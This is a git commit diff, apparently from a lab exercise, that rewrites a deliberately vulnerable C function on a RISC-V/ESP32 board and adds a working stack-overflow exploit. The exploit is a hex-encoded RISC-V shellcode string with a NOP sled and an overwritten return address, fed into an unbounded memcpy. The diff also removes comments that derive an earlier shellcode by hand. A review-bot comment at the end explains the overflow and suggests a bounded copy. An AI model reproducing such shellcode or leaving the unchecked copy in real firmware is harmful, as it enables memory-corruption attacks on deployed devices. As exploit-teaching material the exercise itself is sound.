Commit 2cb7e6b4 authored by fptk's avatar fptk

working attack

parent 60880cec
...@@ -78,7 +78,7 @@ int is_target(char *test) { ...@@ -78,7 +78,7 @@ int is_target(char *test) {
char *attack_me(char *data, uint32_t data_len) { char *attack_me(char *data, uint32_t data_len) {
// nobody could possibly enter a name longer than 20 characters, so this buffer // nobody could possibly enter a name longer than 20 characters, so this buffer
// is definitely large enough // is definitely large enough
char message[28]; char message[128];
memset(message, 'B', sizeof(message)); memset(message, 'B', sizeof(message));
memcpy(message, "Hallo, ", 7); memcpy(message, "Hallo, ", 7);
if(strncmp(data, get_target(), strlen(get_target())) == 0) { if(strncmp(data, get_target(), strlen(get_target())) == 0) {
...@@ -86,7 +86,7 @@ char *attack_me(char *data, uint32_t data_len) { ...@@ -86,7 +86,7 @@ char *attack_me(char *data, uint32_t data_len) {
snprintf(message + 13, 14 , " ist korrekt!"); snprintf(message + 13, 14 , " ist korrekt!");
} }
else { else {
memcpy(message + 7, data, strlen(data) + 2); memcpy(message + 7, data, data_len);
} }
char *result = malloc(strlen(message) + 1); char *result = malloc(strlen(message) + 1);
...@@ -114,63 +114,50 @@ int main(void) { ...@@ -114,63 +114,50 @@ int main(void) {
spi_init(SPICLOCK_80KHZ); spi_init(SPICLOCK_80KHZ);
//char *attack = "a12342234324452346234723482349234HAHA\x80\x12\x01\x20\xca\x13\x01\x20"; char *attack = "sBAUM";
//buffer address char *revattack = "a"
/*
* RISC SPEICHER: "\x37\x05\x01\x20" // 0: lui a0,0x20010
* MSB LSB "\x13\x05\xc5\x55" // 4: addi a0,a0,1372 # 0x2001055c
* 6C6C6148 = 'Hall' | 6c =108 = l "\x13\x0e\x00\x00" // 8: li t3,0
http://csci206sp2020.courses.bucknell.edu/files/2020/01/riscv-card.pdf "\x37\x1e\x01\x20" // c: lui t3,0x20011
lsb MSB "\x13\x0e\xce\x45" // 10: addi t3,t3,1116 # 0x2001145c
0 ...... 31 "\xe7\x0e\x0e\x00" // 14: jalr t4,t3
Lui a5,0x80001 "\x13\x00\x00\x00" // 18: nop
0110 1110 0001 1111 0011 1000 1000 0001
HEX=\x6e\x1f\x38\x81 "\x13\x00\x00\x00" // 20: nop
"\x13\x00\x00\x00" // 20: nop
"\x13\x00\x00\x00"
lw a5, -1375(a5) //1 less than in orig bin, otherwise 0 byte in payload "\x13\x00\x00\x00"
opcode rd f3 rs1 immediate "\x13\x00\x00\x00"
00000011 01110 010 01110 101010100001 "\x13\x00\x00\x00"
0000 0110 1110 0100 1110 1010 1010 0001 "\x13\x00\x00\x00"
HEX=\x06\xe4\xea\xa1 "\x13\x00\x00\x00"
"\x13\x00\x00\x00"
"\x13\x00\x00\x00"
addi a0, 15, 1 "\x13\x00\x00\x00"
opcode rd f3 rs1 immediate "\x13\x00\x00\x00"
0010011 01010 000 01110 000000000001 "\x13\x00\x00\x00"
0010 0110 1010 0000 1110 0000 0000 0001 "\x13\x00\x00\x00"
HEX=\x26\xa0\xe0\x01 "\x13\x00\x00\x00"
"\x13\x00\x00\x00"
"\x13\x00\x00\x00"
jal 0 offset "\x13\x00\x00\x00"
jal 0 0x200113ca "\x13\x00\x00\x00"
1101111 00000 100000000000010001001111001010 "\x13\x00\x00\x00"
1101 1110 0000 0001 0001 0011 1100 1010 "\x13\x00\x00\x00"
HEX=\xde\x01\x13\xca "\x13\x00\x00\x00"
"\x13\x00\x00\x00"
--> the assembly dump is: "\x13\x00\x00\x00"
lui a5, 0x80001 "\x13\x00\x00\x00"
lw a5, -1376(a5) "\x13\x00\x00\x00"
addi a0,15,0 == mv a0,a5
jal 0 offset "\xe4\x0e\x00\x80"
which results in hexdump: "\xe4\x0e\x00\x80";
\x6e\x1f\x38\x81\x06\xe4\xea\xa1\x26\xa0\xe0\x01\xde\x01\x13\xca char *result = attack_me(revattack, 141);
that is 4 instructions each 4 bytes. //char *result = attack_me(attack, 120);
The buffer has 28 Bytes printf("result: %s", result);
The return address to overwrite lies at buffer+44 Bytes.
44-16-7=21 Bytes of garbage (-7 for "Hallo, ")
the new return address:
\x38\x0f\x00\x80
*/
char *attack = "a0aaa1aaa2aaa3aaa\x6e\x1f\x38\x81\x06\xe4\xea\xa1\x26\xa0\xe0\x01\xde\x01\x13\xca\x12\x23\x34\x45\x50\x0f\x00\x80";
char *revattack = "a0aaa1aaa2aaa3aaa\x81\x38\x1f\x6e\xa1\xea\xe4\x06\x01\xe0\xa0\x26\xca\x13\x01\xde\x45\x34\x23\x12\x58\x0f\x00\x80";
char *result = attack_me(revattack, 26);
printf("%s", result);
/* /*
if(webserver_init(ESP32_NETWORK_IMPLEMENTATION) != 0) { if(webserver_init(ESP32_NETWORK_IMPLEMENTATION) != 0) {
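Review bot: The else branch of attack_me in the second hunk still writes a caller-controlled number of bytes into the 128-byte message buffer — data_len is never compared against the space left after the 7-byte "Hallo, " prefix — and because message was pre-filled with 'B' by memset, nothing guarantees a terminator before the strlen(message) on the next line, so both the copy and the length computation can run past the end of the stack buffer. The comment above the declaration in the first hunk ("nobody could possibly enter a name longer than 20 characters") matches neither the resized buffer nor the copy below it, and should be updated or removed. Given the commit title this appears to be the intended exercise target; if the function is ever meant to be safe, clamp the copy and terminate explicitly: `size_t n = data_len < sizeof(message) - 8 ? data_len : sizeof(message) - 8;` / `memcpy(message + 7, data, n);` / `message[7 + n] = '\0';`. attack_me's body starts before the first hunk and continues past the second, so the caller's contract for data_len is not visible here.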